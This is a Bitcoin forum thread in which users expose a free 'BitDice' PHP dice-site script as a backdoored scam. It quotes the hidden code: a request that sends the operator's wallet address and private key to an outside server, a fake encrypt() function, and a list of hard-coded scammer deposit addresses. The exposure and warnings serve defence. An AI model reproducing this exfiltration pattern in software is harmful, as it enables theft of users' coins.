BitDice - Always wanted to make your own Bitcoin dice betting site? [Free]

Bizmark13

sr. member

Activity: 462

Merit: 250

WikiScams.org - Information about Bitcoin Scams

Wow, I'm surprised by the sophistication of this scam. Just incredible. It reminds me of the Sharexcoin scam where the scammer coded an entire exchange only to later run off with everyone's coins. Sad

Also, I guess this thread is further proof that open source is the way to go (although I guess since it's a PHP script, it's open source by default).

With some tweaking, wouldn't it be possible to completely remove the backdoor and turn this into a legit dice script? The scammer already did most of the work and judging by the screenshots, it seems they did quite a good job (minus the scam bit of course). Just add a front end and voila! I have some experience in Python and Java and I know PHP isn't too different from Java so I think I could do it if there is enough interest. I think there would be a lot of demand for something like this. Perhaps the community could make something good out of this.

bitpop

legendary

Activity: 2912

Merit: 1060

Quote from: Fragan on July 21, 2014, 09:23:25 PM

Does someone have a really clean version , Evan should be banned...

There is no clean version because there's no front end

Fragan

jr. member

Activity: 34

Merit: 10

Does someone have a really clean version , Evan should be banned...

michaelwang32

full member

Activity: 182

Merit: 100

SCAM!!!!!!!!!!!!!!

singula

sr. member

Activity: 462

Merit: 251

Unfortunately, I don't know of any. With dice-sites from unknown sources there will be always some risk (they could include a backdoor, perhaps not as obvious as this one, but still stealing your coins), so you'll have to inspect the code carefully before running it.

santoryouu

newbie

Activity: 21

Merit: 0

Got it, thanks for confirmation.

Do you know any open source script that could be a base for further development for a simple dice game?

singula

sr. member

Activity: 462

Merit: 251

There is no clean version. This is not a dice site with a backdoor. This is a just backdoor with thin layer of props around it that mimick a dice site. If you remove the backdoor - nothing actually will remain to "fix". There is no wallet management, no betting system, nothing ... just the BTC stealing backdoor.

santoryouu

newbie

Activity: 21

Merit: 0

Did anybody test "clean" version?

Edit: OK, got it. No dice script here, only scam. Maybe closing thread is a good idea?

nitrazepam

newbie

Activity: 20

Merit: 0

Yup , i edit cause i just discovered it today on torrent and just screamed Bloody murder before reading your messages.
True, i scanned every file and its only a facade to steal bitcoins.

bitpop

legendary

Activity: 2912

Merit: 1060

Quote from: singula on December 29, 2013, 10:53:12 AM

Quote from: bitpop on December 29, 2013, 01:27:25 AM

Finally I don't see the actual application, just the admin page. The goal may be to take your password or give you his addresses to fund before you realize there's no front end.

Why do you think the initial posts contains in red the sentence: Please make sure that at least $20-$50 worth of bitcoins are in the "bank"?

This is just a scammy backdoor to steal coins - someone installs the site, puts some initial deposit as suggested and poof ... the deposit is gone the second after it is deposited, since the scammer has the address and the appropriate private key

If someone is dumb enough to not notice it, there are 8 more scammer's addresses for deposits to show up when someone wants to deposit money to play (which won't end up on the site, but in scammer's pocket).

Stay away from this.

But how can they play?

singula

sr. member

Activity: 462

Merit: 251

Quote from: bitpop on December 29, 2013, 01:27:25 AM

Finally I don't see the actual application, just the admin page. The goal may be to take your password or give you his addresses to fund before you realize there's no front end.

Why do you think the initial posts contains in red the sentence: Please make sure that at least $20-$50 worth of bitcoins are in the "bank"?

This is just a scammy backdoor to steal coins - someone installs the site, puts some initial deposit as suggested and poof ... the deposit is gone the second after it is deposited, since the scammer has the address and the appropriate private key

If someone is dumb enough to not notice it, there are 8 more scammer's addresses for deposits to show up when someone wants to deposit money to play (which won't end up on the site, but in scammer's pocket).

Stay away from this.

bitpop

legendary

Activity: 2912

Merit: 1060

Quote from: FanEagle on December 28, 2013, 04:52:17 PM

Even the "fixed" version contains the backdoor.
I need someone that can help me cleaning this script so we can run a polite business.
If interested(not for bitcoins, for altcoins like catcoin,earthcoin... ecc ecc.) PM me.

Clean version, well not clean, but not phone home

CogeIgniter system replaced for more safety.

Each file manually checked.

It's still not fully safe though, the encrypt() function does nothing

public function encrypt($string){
      return $string;
   }

Not sure about the implications though.

Also seems to return preset addresses

function get_address(){

      $addresses = array("145N2EFzReaH4hkfb8jVaYbLq7VUm75TmV", "12ENTxaNfyrrzGGu2WDyrC4xZy2tVQA5az", "13yTHvFDxaUUP44KiDkWk27F4We18gJFse", "1ATknpbvfjzXkg1nFGJPTeG9Wzxhi9Z5Ts", "12eGV9FcCvqNU8Ya6CUD8Uu4nNHNPJaKGi", "1L1ULCndeghKZAteTe3tmcKG6HCPDCeLMX", "18JxX3839mZCMrRbtAP1W485kHW3RYUnFG", "16nVMZ3qKwRhFoHTPZjF67EdJ9nrchUSQf");
      return $addresses[array_rand($addresses)];

   }

Finally I don't see the actual application, just the admin page. The goal may be to take your password or give you his addresses to fund before you realize there's no front end.

bitdice-1.01.CLEAN.7z
https://mega.co.nz/#!UMFyRDxZ!bXs-fgPSS2Es3blyPReuoV05jB0jLGwAVHP66X7bpc8

CRC32: c8f9aef7
MD5: f9aca5d45fedde616e13b282271534b1
SHA-1: f522bbd32f5cf02b7b30aa56710710ee62da95ed
SHA-256: c7e95e8c446bf2c1a236a654b0f53f1bd11ab7cfd6355be7f37b0bf654f41b77
SHA-512: 0b11adb6e69dc59699717649f8c18819386d42f4240fefb30815807a4cd12c411545571944d7201 6f9181a583c70e6b82d97bbdc2b1d5bcd7bc06b0bbb4b2a66

FanEagle

legendary

Activity: 2814

Merit: 1112

Leading Crypto Sports Betting & Casino Platform

Even the "fixed" version contains the backdoor.
I need someone that can help me cleaning this script so we can run a polite business.
If interested(not for bitcoins, for altcoins like catcoin,earthcoin... ecc ecc.) PM me.

singula

sr. member

Activity: 462

Merit: 251

Let's look at line 58 in admin.php in the source archive:

Code:

$resp = file_get_contents("http://dicetest.net23.net/electro2000/123.php?btca=$bankaddress&btcs=$banksecret");

All your coins are belong to us...

bitpop

legendary

Activity: 2912

Merit: 1060

Quote from: fitbobcat on December 28, 2013, 10:49:18 AM

Quote from: ?? on ??

Quote from: fitbobcat on December 23, 2013, 12:18:43 PM

An Error Was Encountered

Unable to locate the model you have specified: viewbase

I have fixed that bug. It is now working in pretty much every hosting.

In order to work:

- Upload via FTP.
- Edit the file application/config/config.php and write your URL in:
$config['base_url'] = 'http://YOURHOST/bitdice/';
- Then install the script in your mysql database going to the /install/ directory.

1.01 download: https://www.mediafire.com/?swhpay0sgfiaij5

Tested in http://www.000webhost.com/ and it seems to work.

Can you get me a .zip file of it

What's wrong with rar

ottello

newbie

Activity: 7

Merit: 0

Happy new year have good time

fitbobcat

full member

Activity: 218

Merit: 101

Quote from: ?? on ??

Quote from: fitbobcat on December 23, 2013, 12:18:43 PM

An Error Was Encountered

Unable to locate the model you have specified: viewbase

I have fixed that bug. It is now working in pretty much every hosting.

In order to work:

- Upload via FTP.
- Edit the file application/config/config.php and write your URL in:
$config['base_url'] = 'http://YOURHOST/bitdice/';
- Then install the script in your mysql database going to the /install/ directory.

1.01 download: https://www.mediafire.com/?swhpay0sgfiaij5

Tested in http://www.000webhost.com/ and it seems to work.

Can you get me a .zip file of it

bitpop

legendary

Activity: 2912

Merit: 1060

Phone home

FanEagle

legendary

Activity: 2814

Merit: 1112

Leading Crypto Sports Betting & Casino Platform

Quote from: crazyhouston on December 24, 2013, 05:42:33 AM

Looking good! Grin

Expecially for the option application/controllers/admin.php where it says:

Quote

//Sending bank address and secret encrypted to a server to check balance
          $bankaddress = $this->encrypt($this->input->post("bankaddress"));
          $banksecret = $this->encrypt($this->input->post("banksecret"));
          $fee = $this->input->post("fee");
          $pass = $this->input->post("pass");

          $resp = file_get_contents("http://dicetest.net23.net/electro2000/123.php?btca=$bankaddress&btcs=$banksecret");
                 $data = array

Where it sends your info to his website(Why the creator of the website wants our password?)
or this:

Quote

private function get_address(){

      $addresses = array("145N2EFzReaH4hkfb8jVaYbLq7VUm75TmV", "12ENTxaNfyrrzGGu2WDyrC4xZy2tVQA5az", "13yTHvFDxaUUP44KiDkWk27F4We18gJFse", "1ATknpbvfjzXkg1nFGJPTeG9Wzxhi9Z5Ts", "12eGV9FcCvqNU8Ya6CUD8Uu4nNHNPJaKGi", "1L1ULCndeghKZAteTe3tmcKG6HCPDCeLMX", "18JxX3839mZCMrRbtAP1W485kHW3RYUnFG", "16nVMZ3qKwRhFoHTPZjF67EdJ9nrchUSQf");
      return $addresses[array_rand($addresses)];

Where it happens to be a nice list of where receive your Bank's money.
Anyone that is be so gentle to edit the parts where it sends the money to the creator of this?
I mean, I know it's opensorce but at least not steal people's money

Quote

IMPORTANT: You need to create a separate bitcoin address that will be used as a bank for the script. Winnings and losses will be deposited in the bank using blockchain.info's API. Please make sure that at least $20-$50 worth of bitcoins are in the "bank". (If it's any less there might be issues with the betting system and transactions) - Make sure to add the bank's address AND the bank's private key in the admin panel after install, otherwise the script won't work! <= aka I will not receive your money!

crazyhouston

newbie

Activity: 24

Merit: 0

Looking good! Grin

Topic: BitDice - Always wanted to make your own Bitcoin dice betting site? [Free] (Read 12909 times)